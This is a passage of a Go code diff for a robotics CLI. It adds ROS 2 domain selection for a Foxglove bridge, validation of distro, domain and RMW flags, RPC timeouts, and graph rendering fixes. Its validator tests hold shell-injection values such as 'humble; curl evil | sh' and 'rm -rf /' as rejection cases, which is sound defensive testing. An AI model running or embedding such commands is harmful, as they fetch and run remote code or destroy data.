+			return 0, ectx.Err()
+		},
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2Message]{
+		ctx: ctx,
+		onSend: func(int) error {
+			cancel()
+			return nil
+		},
+	}
+	if err := withDeadline(t, func() error {
+		return svc.EchoTopic(&agentpbv2.EchoROS2TopicRequest{Topic: "/chatter"}, stream)
+	}); err != nil {
+		t.Fatalf("client cancel should not be an error, got: %v", err)
+	}
+}

--- a/go/internal/agent/services/ros2_validate_test.go
+++ b/go/internal/agent/services/ros2_validate_test.go
@@ -1,0 +1,67 @@
+package services
+
+import "testing"
+
+// Extends TestValidateROS2GraphName / TestValidateROS2ParamName in
+// ros2_parse_test.go, which cover the shell-metacharacter cases. These cover the
+// *ROS 2 grammar* cases the old patterns let through: `//foo`, `/foo/` and
+// `/1camera` are all illegal ROS 2 names that were forwarded to the CLI and came
+// back as an rclpy traceback instead of a clear InvalidArgument.
+
+func TestValidateROS2GraphName_ROSGrammar(t *testing.T) {
+	valid := []string{
+		"/talker",
+		"/camera/driver",
+		"/a/b/c/d",
+		"talker",              // relative
+		"~/local_param_topic", // private namespace
+		"/_hidden",            // hidden topics start with an underscore
+		"/ns/_hidden",
+		"/T",
+		"/with_underscores_123",
+	}
+	for _, name := range valid {
+		if err := validateROS2GraphName(name); err != nil {
+			t.Errorf("validateROS2GraphName(%q) = %v, want nil", name, err)
+		}
+	}
+
+	invalid := map[string]string{
+		"/":         "bare slash is not a name",
+		"//foo":     "double slash is not a legal ROS 2 name",
+		"/foo//bar": "double slash mid-name",
+		"/foo/":     "trailing slash is not a legal ROS 2 name",
+		"/1camera":  "a ROS 2 name segment may not start with a digit",
+		"1camera":   "a relative name may not start with a digit",
+		"/foo/2bar": "no segment may start with a digit",
+		"/foo-bar":  "hyphens are not legal in ROS 2 names",
+		"~foo":      "~ is only valid as ~/",
+		"/foo\nbar": "newline",
+		"/foo|bar":  "pipe",
+	}
+	for name, why := range invalid {
+		if err := validateROS2GraphName(name); err == nil {
+			t.Errorf("validateROS2GraphName(%q) = nil, want an error (%s)", name, why)
+		}
+	}
+}
+
+func TestValidateROS2ParamName_ROSGrammar(t *testing.T) {
+	for _, ok := range []string{"my_int", "robot.wheel.radius", "a", "A1", "x_1.y_2", "_leading_underscore"} {
+		if err := validateROS2ParamName(ok); err != nil {
+			t.Errorf("validateROS2ParamName(%q) = %v, want nil", ok, err)
+		}
+	}
+	invalid := map[string]string{
+		"1abc":      "leading digit",
+		".leading":  "leading dot",
+		"trailing.": "trailing dot",
+		"a..b":      "empty segment",
+		"a/b":       "slashes are not param separators",
+	}
+	for name, why := range invalid {
+		if err := validateROS2ParamName(name); err == nil {
+			t.Errorf("validateROS2ParamName(%q) = nil, want an error (%s)", name, why)
+		}
+	}
+}

--- a/go/internal/cli/commands/foxglove.go
+++ b/go/internal/cli/commands/foxglove.go
@@ -11,6 +11,8 @@ import (
 	"syscall"
 
 	"github.com/spf13/cobra"
+
+	"github.com/wendylabsinc/wendy/go/internal/shared/appconfig"
 )
 
 // foxgloveBridgePort is the port foxglove_bridge listens on inside the app.
@@ -44,6 +46,7 @@ func newFoxgloveServeCmd() *cobra.Command {
 	var (
 		port   int
 		domain int
+		app    string
 		rmw    string
 		distro string
 		iface  string
@@ -60,14 +63,24 @@ Connect Foxglove Studio to the printed ws:// URL. For a robot whose ROS 2 uses a
 non-default domain or RMW (e.g. a Unitree Go2 on CycloneDDS), pass --domain and
 --rmw so the bridge matches it. The bridge exposes every topic, including hidden
 ROS topics, in the selected domain. Its device-side WebSocket listens only on
-loopback and is accessed through the authenticated Wendy Cloud tunnel.`,
+loopback and is accessed through the authenticated Wendy Cloud tunnel.
+
+Domain selection matters: a robot's native ROS 2 is usually on domain 0, but a
+Wendy-deployed ROS 2 app with no explicit "domainId" gets a stable domain derived
+from its appId — essentially never 0. To bridge one of those, pass --app <appId>
+and the matching domain is computed for you. With neither flag the bridge sits on
+domain 0 and will show an empty graph if that is not where your nodes are.`,
 		Args: cobra.NoArgs,
 		RunE: func(cmd *cobra.Command, _ []string) error {
 			ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)
 			defer stop()
+			resolvedDomain, err := resolveFoxgloveDomain(domain, app, cmd.Flags().Changed("domain"))
+			if err != nil {
+				return err
+			}
 			return foxgloveServe(ctx, foxgloveServeOpts{
 				localPort: port,
-				domain:    domain,
+				domain:    resolvedDomain,
 				rmw:       rmw,
 				distro:    distro,
 				device:    deviceFlag,
@@ -78,6 +91,7 @@ loopback and is accessed through the authenticated Wendy Cloud tunnel.`,
 
 	cmd.Flags().IntVar(&port, "port", foxgloveBridgePort, "Local port to forward foxglove_bridge to")
 	cmd.Flags().IntVar(&domain, "domain", 0, "ROS_DOMAIN_ID the device's ROS 2 uses")
+	cmd.Flags().StringVar(&app, "app", "", "appId of a Wendy-deployed ROS 2 app to bridge; derives its ROS_DOMAIN_ID")
 	cmd.Flags().StringVar(&rmw, "rmw", "rmw_cyclonedds_cpp", "RMW implementation the device's ROS 2 uses")
 	cmd.Flags().StringVar(&distro, "distro", "humble", "ROS 2 distro to build foxglove_bridge from")
 	cmd.Flags().StringVar(&iface, "interface", "", "CycloneDDS network interface to use (for multi-interface devices)")
@@ -92,6 +106,38 @@ type foxgloveServeOpts struct {
 	distro    string
 	device    string // global --device; "" = default device
 	iface     string // optional CycloneDDS network interface
+}
+
+// resolveFoxgloveDomain decides which ROS_DOMAIN_ID the bridge should join.
+//
+// `--domain` defaulted to 0, which is right for a robot's native ROS 2 but wrong
+// for anything Wendy deployed: an app without an explicit domainId gets
+// ROS2AutoDomainID(appID), a stable hash that is essentially never 0. So the
+// no-flag invocation bridged an empty graph with nothing explaining why. Passing
+// `--app <appId>` now derives the same domain the agent injected — it is a pure
+// function of the appId, so no device round-trip is needed — and the bare default
+// says out loud what it is doing.
+func resolveFoxgloveDomain(domain int, appID string, domainSet bool) (int, error) {
+	switch {
+	case domainSet && appID != "":
+		derived := appconfig.ROS2AutoDomainID(appID)
+		if derived != domain {
+			return 0, fmt.Errorf("--domain %d conflicts with --app %q, whose ROS_DOMAIN_ID is %d; pass only one",
+				domain, appID, derived)
+		}
+		return domain, nil
+	case appID != "":
+		derived := appconfig.ROS2AutoDomainID(appID)
+		cliLogln("Using ROS_DOMAIN_ID=%d, derived from appId %q.", derived, appID)
+		return derived, nil
+	case domainSet:
+		return domain, nil
+	default:
+		cliLogln("No --domain or --app given: using ROS_DOMAIN_ID=0 (a robot's native ROS 2). " +
+			"Wendy-deployed ROS 2 apps get a domain derived from their appId, so if you " +
+			"meant to bridge one of those, re-run with --app <appId>.")
+		return 0, nil
+	}
 }
 
 // foxgloveServe generates a foxglove_bridge app in a temp dir, deploys it to the
@@ -165,6 +211,24 @@ func foxgloveServe(ctx context.Context, opts foxgloveServeOpts) error {
 func writeFoxgloveApp(dir string, opts foxgloveServeOpts) error {
 	if opts.iface != "" && !foxgloveInterfacePattern.MatchString(opts.iface) {
 		return fmt.Errorf("invalid network interface %q: use 1-15 letters, digits, '.', '_', ':', or '-'", opts.iface)
+	}
+	// distro lands in three interpolated positions below: two `apt-get install
+	// ros-<distro>-…` lines and the `source /opt/ros/<distro>/setup.bash` inside a
+	// `bash -lc` CMD. %q protects the Dockerfile's JSON tokenisation but not the
+	// shell semantics *inside* the string, so this is validated for the same reason
+	// `iface` is — the comment above foxgloveInterfacePattern already states the
+	// invariant, distro just wasn't held to it.
+	if !appconfig.ROS2DistroPattern.MatchString(opts.distro) {
+		return fmt.Errorf("invalid ROS 2 distro %q: use lowercase letters and digits, "+
+			"starting with a letter (e.g. %q)", opts.distro, appconfig.ROS2DefaultDistro)
+	}
+	if opts.domain < appconfig.ROS2DomainIDMin || opts.domain > appconfig.ROS2DomainIDMax {
+		return fmt.Errorf("invalid --domain %d: must be between %d and %d",
+			opts.domain, appconfig.ROS2DomainIDMin, appconfig.ROS2DomainIDMax)
+	}
+	if opts.rmw != "" && !appconfig.IsValidRMWImplementation(opts.rmw) {
+		return fmt.Errorf("invalid --rmw %q: expected one of rmw_cyclonedds_cpp, "+
+			"rmw_fastrtps_cpp, rmw_connextdds, rmw_gurumdds_cpp", opts.rmw)
 	}
 
 	// Keep the explicit ROS_LOCALHOST_ONLY override in the launch command as a

--- a/go/internal/cli/commands/foxglove_domain_test.go
+++ b/go/internal/cli/commands/foxglove_domain_test.go
@@ -1,0 +1,193 @@
+package commands
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/wendylabsinc/wendy/go/internal/shared/appconfig"
+)
+
+// `--domain` defaulted to 0, which is right for a robot's native ROS 2 and wrong
+// for anything Wendy deployed: an app with no explicit domainId gets
+// ROS2AutoDomainID(appID), a stable hash that is essentially never 0. So the
+// no-flag invocation of `wendy device foxglove serve` bridged an empty graph with
+// nothing on screen explaining why.
+
+func TestResolveFoxgloveDomain_AppIDDerivesTheAgentsDomain(t *testing.T) {
+	appID := "sh.wendy.examples.ros2"
+	want := appconfig.ROS2AutoDomainID(appID)
+	if want == 0 {
+		t.Fatalf("test appId hashes to 0, which defeats the point of the test")
+	}
+	got, err := resolveFoxgloveDomain(0, appID, false)
+	if err != nil {
+		t.Fatalf("resolveFoxgloveDomain: %v", err)
+	}
+	if got != want {
+		t.Errorf("domain = %d, want %d (the domain the agent injects for %q)", got, want, appID)
+	}
+}
+
+func TestResolveFoxgloveDomain_ExplicitDomainWins(t *testing.T) {
+	got, err := resolveFoxgloveDomain(42, "", true)
+	if err != nil {
+		t.Fatalf("resolveFoxgloveDomain: %v", err)
+	}
+	if got != 42 {
+		t.Errorf("domain = %d, want 42", got)
+	}
+}
+
+func TestResolveFoxgloveDomain_BareDefaultIsZero(t *testing.T) {
+	// Still 0 — that is the right default for a robot's native ROS 2. The fix is
+	// that it now says so out loud rather than silently showing an empty graph.
+	got, err := resolveFoxgloveDomain(0, "", false)
+	if err != nil {
+		t.Fatalf("resolveFoxgloveDomain: %v", err)
+	}
+	if got != 0 {
+		t.Errorf("domain = %d, want 0", got)
+	}
+}
+
+func TestResolveFoxgloveDomain_ConflictingFlagsAreRejected(t *testing.T) {
+	appID := "sh.wendy.examples.ros2"
+	derived := appconfig.ROS2AutoDomainID(appID)
+	_, err := resolveFoxgloveDomain(derived+1, appID, true)
+	if err == nil {
+		t.Fatal("expected an error when --domain disagrees with --app")
+	}
+	if !strings.Contains(err.Error(), "conflicts") {
+		t.Errorf("error should explain the conflict, got: %v", err)
+	}
+	// Agreeing values are fine.
+	if _, err := resolveFoxgloveDomain(derived, appID, true); err != nil {
+		t.Errorf("matching --domain and --app should be accepted: %v", err)
+	}
+}
+
+func TestResolveFoxgloveDomain_DerivedDomainIsInRange(t *testing.T) {
+	for _, appID := range []string{
+		"a", "sh.wendy.examples.ros2", "com.example.very.long.app.identifier", "sh.wendy.foxglovebridge",
+	} {
+		got, err := resolveFoxgloveDomain(0, appID, false)
+		if err != nil {
+			t.Fatalf("resolveFoxgloveDomain(%q): %v", appID, err)
+		}
+		if got < appconfig.ROS2DomainIDMin || got > appconfig.ROS2DomainIDMax {
+			t.Errorf("appId %q derived domain %d, outside [%d,%d]",
+				appID, got, appconfig.ROS2DomainIDMin, appconfig.ROS2DomainIDMax)
+		}
+	}
+}
+
+// writeFoxgloveApp interpolates distro into two `apt-get install ros-<distro>-…`
+// lines and into the `source /opt/ros/<distro>/setup.bash` inside a `bash -lc`
+// CMD. %q protects the Dockerfile's JSON tokenisation but not the shell semantics
+// inside the string — and `iface` was already validated with exactly this
+// reasoning stated in a comment, while distro was not held to it.
+
+func TestWriteFoxgloveApp_RejectsMalformedDistro(t *testing.T) {
+	bad := map[string]string{
+		"humble; curl evil | sh": "command chaining inside bash -lc",
+		"humble && rm -rf /":     "command chaining",
+		"$(id)":                  "command substitution",
+		"../../etc":              "path traversal into the source path",
+		"humble extra":           "whitespace",
+		"Humble":                 "uppercase is not a distro name",
+		"":                       "empty",
+		"1humble":                "must start with a letter",
+	}
+	for distro, why := range bad {
+		dir := t.TempDir()
+		err := writeFoxgloveApp(dir, foxgloveServeOpts{
+			distro: distro, rmw: "rmw_cyclonedds_cpp", domain: 0,
+		})
+		if err == nil {
+			t.Errorf("distro %q accepted, want an error (%s)", distro, why)
+			continue
+		}
+		if !strings.Contains(err.Error(), "distro") {
+			t.Errorf("distro %q error should name the flag, got: %v", distro, err)
+		}
+		// Nothing should have been written on the rejection path.
+		if _, statErr := os.Stat(filepath.Join(dir, "Dockerfile")); statErr == nil {
+			t.Errorf("distro %q was rejected but a Dockerfile was still written", distro)
+		}
+	}
+}
+
+func TestWriteFoxgloveApp_AcceptsRealDistros(t *testing.T) {
+	for _, distro := range []string{"humble", "jazzy", "iron", "rolling"} {
+		dir := t.TempDir()
+		if err := writeFoxgloveApp(dir, foxgloveServeOpts{
+			distro: distro, rmw: "rmw_cyclonedds_cpp", domain: 7,
+		}); err != nil {
+			t.Fatalf("distro %q rejected: %v", distro, err)
+		}
+		dockerfile, err := os.ReadFile(filepath.Join(dir, "Dockerfile"))
+		if err != nil {
+			t.Fatalf("reading Dockerfile: %v", err)
+		}
+		if !strings.Contains(string(dockerfile), "FROM ros:"+distro) {
+			t.Errorf("Dockerfile does not target %q:\n%s", distro, dockerfile)
+		}
+	}
+}
+
+func TestWriteFoxgloveApp_RejectsOutOfRangeDomain(t *testing.T) {
+	for _, domain := range []int{-1, 233, 1000} {
+		err := writeFoxgloveApp(t.TempDir(), foxgloveServeOpts{
+			distro: "humble", rmw: "rmw_cyclonedds_cpp", domain: domain,
+		})
+		if err == nil {
+			t.Errorf("domain %d accepted, want an error", domain)
+		}
+	}
+}
+
+func TestWriteFoxgloveApp_RejectsUnknownRMW(t *testing.T) {
+	err := writeFoxgloveApp(t.TempDir(), foxgloveServeOpts{
+		distro: "humble", rmw: "rmw_madeup_cpp", domain: 0,
+	})
+	if err == nil {
+		t.Fatal("expected an error for an unknown --rmw")
+	}
+	if !strings.Contains(err.Error(), "rmw") {
+		t.Errorf("error should name the flag, got: %v", err)
+	}
+}
+
+func TestWriteFoxgloveApp_GeneratedManifestCarriesTheDomain(t *testing.T) {
+	dir := t.TempDir()
+	if err := writeFoxgloveApp(dir, foxgloveServeOpts{
+		distro: "humble", rmw: "rmw_cyclonedds_cpp", domain: 77,
+	}); err != nil {
+		t.Fatalf("writeFoxgloveApp: %v", err)
+	}
+	manifest, err := os.ReadFile(filepath.Join(dir, "wendy.json"))
+	if err != nil {
+		t.Fatalf("reading wendy.json: %v", err)
+	}
+	got := string(manifest)
+	if !strings.Contains(got, `"domainId": 77`) {
+		t.Errorf("manifest should carry the resolved domain:\n%s", got)
+	}
+	if !strings.Contains(got, `"discoveryScope": "host"`) {
+		t.Errorf("the bridge needs host-scoped discovery:\n%s", got)
+	}
+}
+
+// The interface validation this file's distro check was modelled on must keep
+// working.
+func TestWriteFoxgloveApp_InterfaceValidationStillApplies(t *testing.T) {
+	err := writeFoxgloveApp(t.TempDir(), foxgloveServeOpts{
+		distro: "humble", rmw: "rmw_cyclonedds_cpp", domain: 0,
+		iface: "eth0; rm -rf /",
+	})
+	if err == nil {
+		t.Fatal("expected an error for a malformed --interface")
+	}
+}

--- a/go/internal/cli/commands/ros2.go
+++ b/go/internal/cli/commands/ros2.go
@@ -90,8 +90,49 @@ func ros2RPCError(err error) error {
 		return fmt.Errorf("this device's agent does not support ROS 2 inspection; update it with `wendy device update`")
 	case codes.FailedPrecondition:
 		return errors.New(status.Convert(err).Message())
+	case codes.DeadlineExceeded:
+		return errROS2Timeout
+	case codes.ResourceExhausted:
+		// Currently raised when one echoed message exceeds the streaming limit;
+		// the server-side message already explains the remedy.
+		return errors.New(status.Convert(err).Message())
+	}
+	if errors.Is(err, context.DeadlineExceeded) {
+		return errROS2Timeout
 	}
 	return err
+}
+
+// errROS2Timeout replaces a bare "context deadline exceeded" with something the
+// user can act on. The unary RPCs are deadline-bounded (see ros2UnaryTimeout);
+// before that a sidecar stuck on DDS discovery hung the CLI indefinitely with
+// nothing on screen.
+var errROS2Timeout = errors.New("timed out waiting for the device's ROS 2 graph; the sidecar may " +
+	"be stuck on DDS discovery — try `wendy device ros2 doctor`, or narrow the query with --domain")
+
+// Client-side deadlines for the non-streaming ROS 2 RPCs.
+//
+// There were none: every call rode the ambient context, so a stalled DDS
+// discovery inside the sidecar hung the CLI indefinitely with nothing on screen.
+// Each agent-side exec costs roughly a second (container exec dispatch + sourcing
+// the ROS environment + a fresh rclpy process doing discovery), which sets the
+// scale here.
+//
+// Streaming commands — echo, hz, bag record, exec, action send_goal — deliberately
+// get no deadline: they run until the user stops them.
+const (
+	// ros2UnaryTimeout covers a single targeted command plus, on a mixed-RMW
+	// device, its routing probe.
+	ros2UnaryTimeout = 45 * time.Second
+	// ros2FanOutTimeout covers the commands that fan out one exec per node or per
+	// topic (graph, topics --all).
+	ros2FanOutTimeout = 5 * time.Minute
+)
+
+// ros2Ctx derives a deadline-bounded context for a unary RPC. The caller must
+// defer the returned cancel.
+func ros2Ctx(parent context.Context, timeout time.Duration) (context.Context, context.CancelFunc) {
+	return context.WithTimeout(parent, timeout)
 }
 
 // ros2DomainFlag registers the shared --domain override flag.
@@ -146,7 +187,9 @@ func newROS2NodesCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListNodes(cmd.Context(), &agentpbv2.ListROS2NodesRequest{DomainId: ros2DomainPtr(domain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListNodes(rpcCtx, &agentpbv2.ListROS2NodesRequest{DomainId: ros2DomainPtr(domain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -199,7 +242,9 @@ func newROS2TopicsCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListTopics(cmd.Context(), &agentpbv2.ListROS2TopicsRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2FanOutTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListTopics(rpcCtx, &agentpbv2.ListROS2TopicsRequest{
 				DomainId:      ros2DomainPtr(domain),
 				IncludeCounts: all,
 			})
@@ -283,7 +328,9 @@ func newROS2TopicCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.GetTopicInfo(cmd.Context(), &agentpbv2.GetROS2TopicInfoRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.GetTopicInfo(rpcCtx, &agentpbv2.GetROS2TopicInfoRequest{
 				DomainId: ros2DomainPtr(domain),
 				Topic:    args[0],
 			})
@@ -321,7 +368,9 @@ func newROS2ServicesCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListServices(cmd.Context(), &agentpbv2.ListROS2ServicesRequest{DomainId: ros2DomainPtr(domain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListServices(rpcCtx, &agentpbv2.ListROS2ServicesRequest{DomainId: ros2DomainPtr(domain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -387,7 +436,9 @@ func newROS2CallCmd() *cobra.Command {
 			if len(args) == 3 {
 				req.Request = args[2]
 			}
-			resp, err := client.client.CallService(cmd.Context(), req)
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.CallService(rpcCtx, req)
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -419,7 +470,9 @@ func newROS2ParamsCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListParams(cmd.Context(), &agentpbv2.ListROS2ParamsRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListParams(rpcCtx, &agentpbv2.ListROS2ParamsRequest{
 				DomainId: ros2DomainPtr(domain),
 				Node:     node,
 			})
@@ -465,7 +518,9 @@ func newROS2ParamCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.GetParam(cmd.Context(), &agentpbv2.GetROS2ParamRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.GetParam(rpcCtx, &agentpbv2.GetROS2ParamRequest{
 				DomainId: ros2DomainPtr(getDomain),
 				Node:     args[0],
 				Param:    args[1],
@@ -494,7 +549,9 @@ func newROS2ParamCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.SetParam(cmd.Context(), &agentpbv2.SetROS2ParamRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.SetParam(rpcCtx, &agentpbv2.SetROS2ParamRequest{
 				DomainId: ros2DomainPtr(setDomain),
 				Node:     args[0],
 				Param:    args[1],
@@ -532,7 +589,9 @@ func newROS2DoctorCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.Doctor(cmd.Context(), &agentpbv2.ROS2DoctorRequest{DomainId: ros2DomainPtr(domain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.Doctor(rpcCtx, &agentpbv2.ROS2DoctorRequest{DomainId: ros2DomainPtr(domain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -567,7 +626,9 @@ func newROS2ActionCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListActions(cmd.Context(), &agentpbv2.ListROS2ActionsRequest{DomainId: ros2DomainPtr(listDomain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListActions(rpcCtx, &agentpbv2.ListROS2ActionsRequest{DomainId: ros2DomainPtr(listDomain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -621,7 +682,9 @@ func newROS2ActionCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.GetActionInfo(cmd.Context(), &agentpbv2.GetROS2ActionInfoRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.GetActionInfo(rpcCtx, &agentpbv2.GetROS2ActionInfoRequest{
 				DomainId: ros2DomainPtr(infoDomain),
 				Action:   args[0],
 			})
@@ -737,7 +800,9 @@ func newROS2LifecycleCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListLifecycleNodes(cmd.Context(), &agentpbv2.ListROS2LifecycleNodesRequest{DomainId: ros2DomainPtr(nodesDomain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListLifecycleNodes(rpcCtx, &agentpbv2.ListROS2LifecycleNodesRequest{DomainId: ros2DomainPtr(nodesDomain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -786,7 +851,9 @@ func newROS2LifecycleCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.GetLifecycleState(cmd.Context(), &agentpbv2.GetROS2LifecycleStateRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.GetLifecycleState(rpcCtx, &agentpbv2.GetROS2LifecycleStateRequest{
 				DomainId: ros2DomainPtr(getDomain),
 				Node:     args[0],
 			})
@@ -814,7 +881,9 @@ func newROS2LifecycleCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListLifecycleTransitions(cmd.Context(), &agentpbv2.ListROS2LifecycleTransitionsRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListLifecycleTransitions(rpcCtx, &agentpbv2.ListROS2LifecycleTransitionsRequest{
 				DomainId: ros2DomainPtr(listDomain),
 				Node:     args[0],
 			})
@@ -860,7 +929,9 @@ func newROS2LifecycleCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.SetLifecycleState(cmd.Context(), &agentpbv2.SetROS2LifecycleStateRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.SetLifecycleState(rpcCtx, &agentpbv2.SetROS2LifecycleStateRequest{
 				DomainId:   ros2DomainPtr(setDomain),
 				Node:       args[0],
 				Transition: args[1],
@@ -902,7 +973,9 @@ func newROS2ComponentCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListComponents(cmd.Context(), &agentpbv2.ListROS2ComponentsRequest{DomainId: ros2DomainPtr(listDomain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListComponents(rpcCtx, &agentpbv2.ListROS2ComponentsRequest{DomainId: ros2DomainPtr(listDomain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -962,7 +1035,9 @@ func newROS2ComponentCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.LoadComponent(cmd.Context(), &agentpbv2.LoadROS2ComponentRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.LoadComponent(rpcCtx, &agentpbv2.LoadROS2ComponentRequest{
 				DomainId:  ros2DomainPtr(loadDomain),
 				Container: args[0],
 				Package:   args[1],
@@ -996,7 +1071,9 @@ func newROS2ComponentCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.UnloadComponent(cmd.Context(), &agentpbv2.UnloadROS2ComponentRequest{
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.UnloadComponent(rpcCtx, &agentpbv2.UnloadROS2ComponentRequest{
 				DomainId:  ros2DomainPtr(unloadDomain),
 				Container: args[0],
 				Uid:       uint32(uid),
@@ -1160,7 +1237,9 @@ func newROS2GraphCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.GetGraph(cmd.Context(), &agentpbv2.GetROS2GraphRequest{DomainId: ros2DomainPtr(domain)})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2FanOutTimeout)
+			defer rpcCancel()
+			resp, err := client.client.GetGraph(rpcCtx, &agentpbv2.GetROS2GraphRequest{DomainId: ros2DomainPtr(domain)})
 			if err != nil {
 				return ros2RPCError(err)
 			}
@@ -1307,7 +1386,9 @@ func newROS2BagListCmd() *cobra.Command {
 			}
 			defer client.Close()
 
-			resp, err := client.client.ListBags(cmd.Context(), &agentpbv2.ListROS2BagsRequest{})
+			rpcCtx, rpcCancel := ros2Ctx(cmd.Context(), ros2UnaryTimeout)
+			defer rpcCancel()
+			resp, err := client.client.ListBags(rpcCtx, &agentpbv2.ListROS2BagsRequest{})
 			if err != nil {
 				return ros2RPCError(err)
 			}

--- a/go/internal/cli/commands/ros2_graph.go
+++ b/go/internal/cli/commands/ros2_graph.go
@@ -66,8 +66,8 @@ func ros2GraphEdges(graph *agentpbv2.GetROS2GraphResponse) (pubs, subs map[ros2E
 }
 
 // renderROS2GraphASCII renders the node graph as one "publisher ──topic──▶
-// subscriber" line per edge, with dangling publications and isolated nodes
-// listed afterwards (WDY-1333).
+// subscriber" line per edge, with dangling publications, dangling subscriptions
+// and genuinely isolated nodes listed afterwards (WDY-1333).
 func renderROS2GraphASCII(graph *agentpbv2.GetROS2GraphResponse) string {
 	pubs, subs := ros2GraphEdges(graph)
 
@@ -96,6 +96,31 @@ func renderROS2GraphASCII(graph *agentpbv2.GetROS2GraphResponse) string {
 				connected[pub] = true
 				connected[sub] = true
 			}
+		}
+	}
+
+	// Dangling *subscriptions* used to be invisible: the render only walked `pubs`,
+	// so a topic with subscribers but no publisher produced no line at all, and its
+	// subscribers then appeared under "Isolated nodes (no graph connections)" —
+	// which is wrong, they do have a subscription. It is also the single most useful
+	// thing a graph can tell you while debugging ("nothing is publishing what my
+	// node is waiting for"), so it gets the mirror of the no-subscribers rendering.
+	subOnlyKeys := make([]ros2EdgeKey, 0, len(subs))
+	for k := range subs {
+		if len(pubs[k]) == 0 {
+			subOnlyKeys = append(subOnlyKeys, k)
+		}
+	}
+	sort.Slice(subOnlyKeys, func(i, j int) bool {
+		if subOnlyKeys[i].topic != subOnlyKeys[j].topic {
+			return subOnlyKeys[i].topic < subOnlyKeys[j].topic
+		}
+		return subOnlyKeys[i].rmw < subOnlyKeys[j].rmw
+	})
+	for _, k := range subOnlyKeys {
+		for _, sub := range subs[k] {
+			fmt.Fprintf(&b, "(no publishers) ──%s──▶ [%s]\n", k.topic, sub)
+			connected[sub] = true
 		}
 	}
 
@@ -136,8 +161,19 @@ func renderROS2GraphDOT(graph *agentpbv2.GetROS2GraphResponse) string {
 	for _, node := range graph.GetNodes() {
 		fmt.Fprintf(&b, "  %q;\n", ros2GraphNodeLabel(ros2GraphNodeFQN(node), node.GetRmw(), tagged))
 	}
-	keys := make([]ros2EdgeKey, 0, len(pubs))
+	// Every topic that appears on either side, so dangling publications and
+	// dangling subscriptions are drawn rather than dropped — matching
+	// renderROS2GraphASCII. Rendering only the intersection hid exactly the
+	// case you draw a graph to find.
